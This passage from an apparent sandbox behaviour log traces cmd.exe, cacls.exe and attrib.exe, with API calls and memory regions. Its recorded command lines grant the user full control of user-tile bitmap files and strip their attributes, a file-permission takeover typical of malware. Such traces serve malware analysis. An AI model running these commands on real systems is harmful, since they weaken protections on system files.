lpSize=0x28ef08) returned 1 [0187.842] UpdateProcThreadAttribute (in: lpAttributeList=0x28ee40, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ef00, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28ee40, lpPreviousValue=0x0) returned 1 [0187.842] GetStartupInfoW (in: lpStartupInfo=0x28edfc | out: lpStartupInfo=0x28edfc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0187.842] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0187.842] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28ee9c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28eee8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\"", lpProcessInformation=0x28eee8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xf4c, dwThreadId=0x8b4)) returned 1 [0187.843] CloseHandle (hObject=0x50) returned 1 [0187.843] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0187.843] GetEnvironmentStringsW () returned 0x62410* [0187.843] FreeEnvironmentStringsW (penv=0x62410) returned 1 [0187.843] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0187.884] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x28eddc | out: lpExitCode=0x28eddc*=0x0) returned 1 [0187.884] CloseHandle (hObject=0x4c) returned 1 [0187.884] _vsnwprintf (in: _Buffer=0x28ef24, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ede8 | out: _Buffer="00000000") returned 8 [0187.884] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0187.885] GetEnvironmentStringsW () returned 0x62410* [0187.885] FreeEnvironmentStringsW (penv=0x62410) returned 1 [0187.885] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0187.885] GetEnvironmentStringsW () returned 0x62410* [0187.885] FreeEnvironmentStringsW (penv=0x62410) returned 1 [0187.885] DeleteProcThreadAttributeList (in: lpAttributeList=0x28ee40 | out: lpAttributeList=0x28ee40) [0187.885] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.885] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0187.885] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.885] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0187.885] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.885] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0187.885] SetConsoleInputExeNameW () returned 0x1 [0187.885] GetConsoleOutputCP () returned 0x1b5 [0187.885] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0187.885] SetThreadUILanguage (LangId=0x0) returned 0x409 [0187.886] exit (_Code=0) Process: id = "398" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16ca0" os_pid = "0xf00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "397" os_parent_pid = "0x908" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27179 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27180 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27181 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27182 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 27183 start_va = 0xd0000 end_va = 0xd8fff entry_point = 0xd0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 27184 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27185 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27186 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27187 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27188 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27189 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27190 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27191 start_va = 0xe0000 end_va = 0x146fff entry_point = 0xe0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27192 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 27193 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 27194 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27195 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27196 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27197 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27198 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27199 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27200 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 567 os_tid = 0x4f4 Thread: id = 568 os_tid = 0xed8 Process: id = "399" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ca0" os_pid = "0xf4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "397" os_parent_pid = "0x908" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27201 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27202 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27203 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27204 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 27205 start_va = 0xd20000 end_va = 0xd26fff entry_point = 0xd20000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 27206 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27207 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27208 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27209 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27210 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27211 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27212 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27213 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27214 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 27215 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 27216 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 27217 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27218 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27219 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27220 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27221 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27222 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27223 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27224 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27225 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27226 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27227 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27228 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 27229 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27230 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 569 os_tid = 0x8b4 Process: id = "400" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ca0" os_pid = "0xec8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27231 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27232 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27233 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27234 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 27235 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 27236 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27237 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27238 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27239 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 27240 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27241 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27242 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27243 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27244 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 27245 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 27246 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 27247 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27248 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27249 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27250 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27251 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27252 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27253 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27254 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27255 start_va = 0x3c0000 end_va = 0x487fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 27256 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27257 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27258 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 27259 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 27260 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 27261 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 27262 start_va = 0x5a0000 end_va = 0x6a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 27263 start_va = 0x6b0000 end_va = 0x12affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 27264 start_va = 0x12b0000 end_va = 0x1412fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012b0000" filename = "" Region: id = 27265 start_va = 0x1420000 end_va = 0x16eefff entry_point = 0x1420000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 570 os_tid = 0xff0 [0187.937] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f884 | out: lpSystemTimeAsFileTime=0x26f884*(dwLowDateTime=0xa4ebc300, dwHighDateTime=0x1d440a9)) [0187.937] GetCurrentProcessId () returned 0xec8 [0187.937] GetCurrentThreadId () returned 0xff0 [0187.937] GetTickCount () returned 0x35a11 [0187.937] QueryPerformanceCounter (in: lpPerformanceCount=0x26f87c | out: lpPerformanceCount=0x26f87c*=24472599613) returned 1 [0187.937] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0187.937] __set_app_type (_Type=0x1) [0187.937] __p__fmode () returned 0x76b331f4 [0187.937] __p__commode () returned 0x76b331fc [0187.938] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0187.938] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0187.938] GetCurrentThreadId () returned 0xff0 [0187.938] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xff0) returned 0x38 [0187.938] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0187.938] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0187.938] SetThreadUILanguage (LangId=0x0) returned 0x409 [0187.938] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0187.938] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f814 | out: phkResult=0x26f814*=0x0) returned 0x2 [0187.938] VirtualQuery (in: lpAddress=0x26f84b, lpBuffer=0x26f7e4, dwLength=0x1c | out: lpBuffer=0x26f7e4*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0187.938] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f7e4, dwLength=0x1c | out: lpBuffer=0x26f7e4*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0187.938] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f7e4, dwLength=0x1c | out: lpBuffer=0x26f7e4*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0187.938] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f7e4, dwLength=0x1c | out: lpBuffer=0x26f7e4*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0187.938] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f7e4, dwLength=0x1c | out: lpBuffer=0x26f7e4*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x50000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0187.938] GetConsoleOutputCP () returned 0x1b5 [0187.938] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0187.939] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0187.939] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.939] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0187.939] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.939] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0187.939] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.939] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0187.939] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.939] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0187.939] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.939] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0187.939] GetEnvironmentStringsW () returned 0x2d0308* [0187.940] FreeEnvironmentStringsW (penv=0x2d0308) returned 1 [0187.940] GetEnvironmentStringsW () returned 0x2d0308* [0187.940] FreeEnvironmentStringsW (penv=0x2d0308) returned 1 [0187.940] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e784 | out: phkResult=0x26e784*=0x40) returned 0x0 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x0, lpData=0x26e790*=0xb8, lpcbData=0x26e788*=0x1000) returned 0x2 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x4, lpData=0x26e790*=0x1, lpcbData=0x26e788*=0x4) returned 0x0 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x0, lpData=0x26e790*=0x1, lpcbData=0x26e788*=0x1000) returned 0x2 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x4, lpData=0x26e790*=0x0, lpcbData=0x26e788*=0x4) returned 0x0 [0187.940] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e78c, lpData=0x26e790, lpcbData=0x26e788*=0x1000 | out: lpType=0x26e78c*=0x4, lpData=0x26e790*=0x40, 